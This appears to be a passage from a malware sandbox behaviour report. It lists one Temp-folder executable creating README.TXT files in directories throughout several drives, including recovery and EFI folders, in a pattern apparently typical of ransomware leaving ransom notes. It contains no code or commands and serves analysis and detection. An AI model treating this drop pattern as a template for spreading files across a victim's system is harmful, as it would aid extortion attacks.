                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\cef\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\libs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\cef\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\libs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\cef\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\libs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Y:\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\Recovery\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\Recovery\WindowsRE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\$WinREAgent\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Recovery\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\$WinREAgent\Scratch\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\hiimkmnozwszqjugwobwhqxnrnmtkuxvarhzazhqixnggczzvljgcjvbzdoweyuvtcbxgklmswqdd\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\jdownloader\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\mozilla maintenance service\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Microsoft Office 15\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Uninstall Information\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Y:\EFI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Icons\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Include\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\SciTE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Office16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\jdownloader\config\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\LogoImages\README.TXT
